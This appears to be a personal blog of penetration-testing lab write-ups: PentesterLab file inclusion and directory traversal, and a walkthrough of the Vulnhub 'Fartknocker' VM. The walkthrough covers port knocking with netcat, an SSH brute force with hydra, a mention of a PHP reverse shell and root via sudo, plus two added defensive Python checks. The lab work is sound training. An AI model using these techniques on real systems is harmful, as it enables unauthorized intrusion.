Saturday, 30 May 2015

Web for Pentester - File Inclusion

There are two types of file inclusion: Local and Remote.

Example 1.

Below is an example of Local File Inclusion. Remote is also an option; however, I will cover that in Example 2.

Example 2.

I decided to use Pentest Monkey's PHP reverse shell.

After a quick edit, it was good to go.

I used Python's inbuilt SimpleHTTPServer to host the script on my machine, and set up a simple netcat listener for it to connect back to.


Remote File Include: a php-reverse-shell which connected back to my netcat listener.

I won't cover escalating; that is for another day.
For now a foothold will suffice =)

Thanks for reading.

Web for Pentester - Directory Traversal

There are 3 Examples to complete.

Viewing the Source shows these better.

1. No real issues.

2. A different approach, as the first method didn't work.


3. This was much harder; after trying a few options, I decided to employ DotDotPwn to find it.

perl -m http-url -h -u -o unix -b -k root

Now to test it in a browser.

Further Reading can be found here:

Thanks for reading.

Web for Pentester VM - Pentesterlab

Web for Pentester


Pentesterlab Course link

This VM is a very nice collection of the different web vulnerabilities.


The pre-write-up bit

Note: I don't do any of this for a living, and I don't claim to be all-knowing.


Any findings will be very brief, and sometimes incomplete.

And of course, it's gonna be back to front.

I'll decide on formatting it later on, but at the moment I can't be bothered =)


Directory Traversal 

Thursday, 7 May 2015

Thursday, 16 April 2015

TopHatSec - Fartknocker VM - Hosted on Vulnhub


arp gives:


Address                  HWtype  HWaddress           Flags Mask            Iface
                         ether   08:00:27:91:bc:58   C                     vboxnet0



Nmap 6.47 scan initiated Sat Apr 11 10:48:06 2015 as: nmap -sS -A -p- -oA fartknocker
Nmap scan report for
Host is up (0.0012s latency).
Not shown: 65534 closed ports
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:91:BC:58 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop

1   1.18 ms

OS and Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Apr 11 10:48:23 2015 -- 1 IP address (1 host up) scanned in 17.77 seconds

The scan shows a webserver running.



- Nikto v2.1.5/2.1.5
+ Target Host:
+ Target Port: 80
+ GET /: Server leaks inodes via ETags, header found with file /, fields: 0x68 0x5105a792cb1f8
+ GET /: The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-3233: GET /icons/README: /icons/README: Apache default file found


Not much from that...

So I decided to visit the page with a browser.

The link Wooah gives pcap1.pcap

Opening it up with Wireshark gives a lot of ICMP flying back and forth; however, lower down something is happening.

TCP Ports 7000, 8000, 9000 and 8888 are used.

I probed into this, knowing that knockd was a possibility (given there is a webserver running with no means of remote administration in place).

Given my Python abilities are... basic to say the least, I knocked up a simple bash script utilising netcat.

nc -v 7000
nc -v 8000
nc -v 9000
nc -v 8888

After a few frustrating attempts, it finally worked!


nc: connect to port 7000 (tcp) failed: Connection refused
nc: connect to port 8000 (tcp) failed: Connection refused
nc: connect to port 9000 (tcp) failed: Connection refused
Connection to 8888 port [tcp/*] succeeded!
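As an added example (not code from the original post), this models what knockd does with the sequence above by replaying constructed iptables LOG lines: a source that hits 7000, 8000, 9000 in order gets 8888 opened, while an out-of-order or too-slow knocker does not. The addresses and the 10-second timeout are assumptions.

```python
import re

# Ports from the write-up: the first three are the knock, the fourth opens on success.
KNOCK_SEQUENCE = (7000, 8000, 9000)
PROTECTED_PORT = 8888
SEQ_TIMEOUT = 10.0  # seconds allowed between knocks (assumed; knockd calls it seq_timeout)

# Constructed iptables LOG lines: first source knocks in order, second out of order.
SAMPLE_LOG = """\
1428750480 kernel: [KNOCK] IN=eth0 SRC=192.0.2.10 DST=192.0.2.20 PROTO=TCP SPT=51000 DPT=7000 SYN
1428750481 kernel: [KNOCK] IN=eth0 SRC=192.0.2.10 DST=192.0.2.20 PROTO=TCP SPT=51001 DPT=8000 SYN
1428750482 kernel: [KNOCK] IN=eth0 SRC=192.0.2.10 DST=192.0.2.20 PROTO=TCP SPT=51002 DPT=9000 SYN
1428750483 kernel: [KNOCK] IN=eth0 SRC=192.0.2.10 DST=192.0.2.20 PROTO=TCP SPT=51003 DPT=8888 SYN
1428750490 kernel: [KNOCK] IN=eth0 SRC=198.51.100.7 DST=192.0.2.20 PROTO=TCP SPT=40000 DPT=7000 SYN
1428750491 kernel: [KNOCK] IN=eth0 SRC=198.51.100.7 DST=192.0.2.20 PROTO=TCP SPT=40001 DPT=9000 SYN
1428750492 kernel: [KNOCK] IN=eth0 SRC=198.51.100.7 DST=192.0.2.20 PROTO=TCP SPT=40002 DPT=8888 SYN
"""
LINE_RE = re.compile(r"^(?P<ts>\d+) .*SRC=(?P<src>[\d.]+) .*DPT=(?P<dpt>\d+)")

def parse_log(text):
    """Yield (timestamp, source, dport) per LOG line; unparsable lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield float(m["ts"]), m["src"], int(m["dpt"])

def replay(events, sequence=KNOCK_SEQUENCE, timeout=SEQ_TIMEOUT):
    """Model knockd: a source advances one correct port at a time; a wrong port or a
    gap over timeout resets it. Returns (sources that completed the knock,
    [(src, ts)] of attempts on the protected port that would be let through)."""
    progress = {}                      # src -> (next index in sequence, last knock time)
    opened, allowed = set(), []
    for ts, src, port in events:
        idx, last = progress.get(src, (0, ts))
        if ts - last > timeout:
            idx = 0                    # knocks too far apart: start the sequence over
        if port == PROTECTED_PORT:
            if src in opened:
                allowed.append((src, ts))
            progress[src] = (0, ts)    # traffic to the guarded port is not a knock
            continue
        if port == sequence[idx]:
            idx += 1
        else:
            idx = 1 if port == sequence[0] else 0   # wrong port: reset, allow a fresh start
        if idx == len(sequence):
            opened.add(src)            # sequence complete: knockd would add the allow rule
            idx = 0
        progress[src] = (idx, ts)
    return opened, allowed
```

Run over real firewall logs, a source completing the sequence shortly before a successful connection to the guarded port is exactly the pattern a defender would alert on.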


Visiting the site with a browser gives:

The link gives another pcap file, pcap2.pcap.


Wireshark shows some more ICMP and ARP traffic; however, more connections are established, to different ports.

Connections to TCP 21, UDP 22, TCP 80 and 8080; then a connection was established to http-alt (port 8080) and data went back and forth.

So I probed with another bash script to ports 1,3,3,7 to no avail.
I decided to go slightly more upmarket and use knock-knock.
After a bit of tweaking the script kicked in.

[-] Scanning with Nmap, this could take a minute...go get some coffee

[-] Sending default knockd sequence to

[-] Scanning again...too soon for more coffee???

[+] 1 new port(s) opened...
(1337, 'tcp')

Writing to output file - outfile.txt

It showed port 1337 was now open.

nc -vv 1337
Connection to 1337 port [tcp/*] succeeded!

No pcap file this time though; however "all about that base" was a clue.

echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" > base64_encoded.txt

base64 -d base64_encoded.txt
Open up SSH: 8888 9999 7777 6666

Another knocking sequence, so I returned to my bash script method.

nc -v 8888
nc -v 9999
nc -v 7777
nc -v 6666
nc -v 22

nc: connect to port 8888 (tcp) failed: Connection refused
nc: connect to port 9999 (tcp) failed: Connection refused
nc: connect to port 7777 (tcp) failed: Connection refused
nc: connect to port 6666 (tcp) failed: Connection refused
Connection to 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2

Port 22 is now open, nice one!

# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #

However, this was not to be as smooth as I initially thought...

butthead@'s password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:
Last login: Sun Apr 12 15:01:54 2015 from
You are only logging in for a split second! What do you do!
Connection to closed.


After a little digging in the man pages of ssh, I stumbled across it.


     ssh — OpenSSH SSH client (remote login program)

     ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
         [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file]
         [-L [bind_address:]port:host:hostport] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option]
         [-p port] [-Q cipher | cipher-auth | mac | kex | key] [-R [bind_address:]port:host:hostport]
         [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command]

ssh -l butthead /bin/bash
butthead@'s password:

After a few seconds waiting and thinking, I gave the "ls" command.

uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)
cat nachos
Great job on getting this far.

Can you login as beavis or root ?

This was another hint...

cat /etc/passwd | grep beavis

I took a while looking through the home folder of "beavis" and not finding much, I decided to set hydra loose on the ssh service.

After no luck using conventional wordlists, I used cewl to generate my own from a Wikipedia page on Beavis and Butthead.

[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[22][ssh] host:   login: beavis   password: mikejudge
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2015-04-12 22:08:18

Hydra had found a valid password for the user "beavis".

Logging in....

beavis@'s password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)

 * Documentation:
Last login: Sun Apr 12 17:07:32 2015 from

It was starting to go very well, time to start looking for ways to obtain root...

beavis@Huhuhhhhhuhuhhh:~$ id
uid=1000(beavis) gid=1000(beavis) groups=1000(beavis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
beavis@Huhuhhhhhuhuhhh:~$ sudo -l
[sudo] password for beavis: 

Matching Defaults entries for beavis on Huhuhhhhhuhuhhh:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User beavis may run the following commands on Huhuhhhhhuhuhhh:
    (ALL : ALL) ALL

A quick check of id shows beavis is in group 27(sudo) and can run commands (ALL : ALL) ALL.
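An added audit check, not from the original post, that parses `sudo -l` output like the block above and flags rules which hand the user every command as root or as anyone; the rule layout it expects (one `(runas) [TAG:] command` entry per line under the "User X may run" header) is an assumption beyond the lines shown.

```python
import re

# The sudo -l output shown in the write-up, embedded here as the sample input.
SUDO_L_OUTPUT = r"""Matching Defaults entries for beavis on Huhuhhhhhuhuhhh:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User beavis may run the following commands on Huhuhhhhhuhuhhh:
    (ALL : ALL) ALL
"""

USER_RE = re.compile(r"^User (\S+) may run the following commands on (\S+):")
# (runas) optional TAG: then one or more comma-separated commands (assumed layout)
RULE_RE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Return (user, host, runas, tags, command) tuples from `sudo -l` output."""
    rules, user, host = [], None, None
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user, host = m.groups()       # rule lines only count after this header
            continue
        m = RULE_RE.match(line) if user else None
        if m:
            for cmd in m["cmds"].split(","):
                rules.append((user, host, m["runas"].strip(), m["tags"].strip(), cmd.strip()))
    return rules

def unrestricted_rules(text):
    """Rules granting any command (ALL) with a run-as user of ALL or root, i.e. full root."""
    return [r for r in parse_sudo_l(text)
            if r[4] == "ALL" and r[2].split(":")[0].strip() in ("ALL", "root")]
```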

beavis@Huhuhhhhhuhuhhh:~$ sudo bash
root@Huhuhhhhhuhuhhh:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Huhuhhhhhuhuhhh:~# cd /root
root@Huhuhhhhhuhuhhh:/root# ls
root@Huhuhhhhhuhuhhh:/root# more SECRETZ
You have done a great job, if you can see this, please shoot me an email
and let me know that you have beat this box!




Thanks to everyone at Vulnhub for the guidance over the time I've been there.

Special Thanks To Tophatsec for creating this challenge.